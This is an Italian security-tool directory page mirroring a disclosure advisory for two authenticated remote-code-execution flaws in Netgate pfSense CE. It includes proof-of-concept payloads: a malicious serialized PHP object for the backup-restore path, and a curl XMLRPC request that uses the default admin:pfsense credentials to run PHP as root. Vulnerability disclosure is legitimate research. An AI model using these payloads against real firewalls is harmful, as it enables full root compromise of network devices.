Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69690-CVE-2025-69691 — RCE autenticata in Netgate pfSense CE 2.7.2 e 2.8.0 | Kitploit
Strumenti/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

RCE autenticata in Netgate pfSense CE 2.7.2 e 2.8.0

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔐 CVE-2025-69690 & CVE-2025-69691

Esecuzione di codice da remoto autenticata in Netgate pfSense Community Edition

CVE CVE CVSS Vendor Status


📋 Riepilogo

CampoDettagli
RicercatoreNelson Adhepeau (@privlabs)
FornitoreNetgate
ProdottopfSense Community Edition
Versioni2.7.2 e 2.8.0
TipoEsecuzione di codice da remoto autenticata
DivulgazioneFebbraio 2026
Fornitore informato2 dicembre 2025
CVE assegnato28 gennaio 2026

⚠️ Avvertenza

Questa ricerca è stata condotta in ambienti di laboratorio isolati esclusivamente a scopo didattico e di sensibilizzazione sulla sicurezza. Tutte le scoperte sono state divulgate in modo responsabile al fornitore prima della pubblicazione. Questa segnalazione non costituisce un invito ad attaccare sistemi in produzione. I test non autorizzati sono illegali.


🎯 CVE-2025-69690

Deserializzazione non sicura → RCE (pfSense CE 2.7.2)

CampoValore
CVSS v3.18.8 (Alto)
VettoreAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
Tipo di attaccoAutenticato (Admin)
ComponenteMeccanismo di backup/ripristino

Descrizione

Il meccanismo di ripristino della configurazione di pfSense invoca unserialize() su dati controllati dall'utente senza whitelist delle classi, validazione dell'input o sandboxing.

Un file di backup appositamente creato contenente un oggetto PHP serializzato malevolo inietta comandi arbitrari tramite la proprietà post_reboot_commands, che vengono eseguiti tramite mwexec() con pieni privilegi di root.

Flusso di attacco

root@kitploit:~
[Attacker] → Login as admin
           → Upload malicious .xml backup file
           → Trigger restore
           → pfSense calls unserialize() on attacker data
           → post_reboot_commands executed via mwexec()
           → [ROOT SHELL]

Componenti interessati

  • config.php — logica di elaborazione del ripristino
  • classe pfsense_module_installer — bersaglio della deserializzazione non sicura
  • mwexec() — sink di esecuzione dei comandi

Payload PoC

root@kitploit:~
O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

Impatto

  • ✅ Esecuzione arbitraria di comandi del sistema operativo come root
  • ✅ Installazione persistente di backdoor
  • ✅ Compromissione completa del firewall
  • ✅ Esfiltrazione di credenziali e configurazioni

Risposta del fornitore

"Riconosciuto. Classificato come abuso amministrativo autenticato. Nessuna patch verrà rilasciata." — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

CampoValore
CVSS v3.19.9 (Critico)
VettoreAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284, CWE-915
Tipo di attaccoAutenticato (remoto, Basic Auth)
ComponenteXMLRPC API — pfsense.exec_php

Descrizione

pfSense CE 2.8.0 espone un metodo XMLRPC pfsense.exec_php che esegue codice PHP arbitrario come root senza validazione, sandboxing o qualsiasi forma di restrizione.

L'endpoint è:

  • ✅ Abilitato per impostazione predefinita
  • ✅ Accessibile da remoto tramite HTTPS
  • ✅ Protetto solo da autenticazione di base
  • ✅ Sfruttabile con credenziali predefinite (admin:pfsense)

Flusso di attacco

root@kitploit:~
[Attacker] → Send XMLRPC request to /xmlrpc.php
           → Authenticate with admin:pfsense (default)
           → Call pfsense.exec_php with arbitrary PHP
           → Code executes as root, no sandboxing
           → [ROOT SHELL]

Componenti interessati

  • xmlrpc.php — punto di ingresso dell'API
  • pfsense.exec_php — esecuzione dinamica non sicura di codice
  • livello BasicAuth — controllo degli accessi insufficiente

PoC

root@kitploit:~
curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

Impatto

  • ✅ Compromissione totale di root da remoto
  • ✅ Lettura/scrittura arbitraria di file
  • ✅ Distribuzione di backdoor
  • ✅ Manipolazione delle regole del firewall
  • ✅ Estrazione di tutte le credenziali e configurazioni

Risposta del fornitore

"Riconosciuto. Classificato come comportamento atteso per gli utenti autenticati. Nessuna patch pianificata." — Netgate


📅 Cronologia

root@kitploit:~
November 2025     →  Vulnerabilities discovered
December 2, 2025  →  Responsible disclosure to Netgate
                  →  Vendor acknowledged, no patch planned
January 28, 2026  →  CVE IDs assigned by MITRE
February 2026     →  Public disclosure

🔗 Riferimenti

  • 🔴 CVE-2025-69690 su cve.org
  • 🔴 CVE-2025-69691 su cve.org
  • 📧 Divulgazione completa: [email protected]

👤 Ricercatore

Nelson Adhepeau — Ricercatore di sicurezza indipendente

LinkedIn GitHub

📧 [email protected]

Scarica lo strumento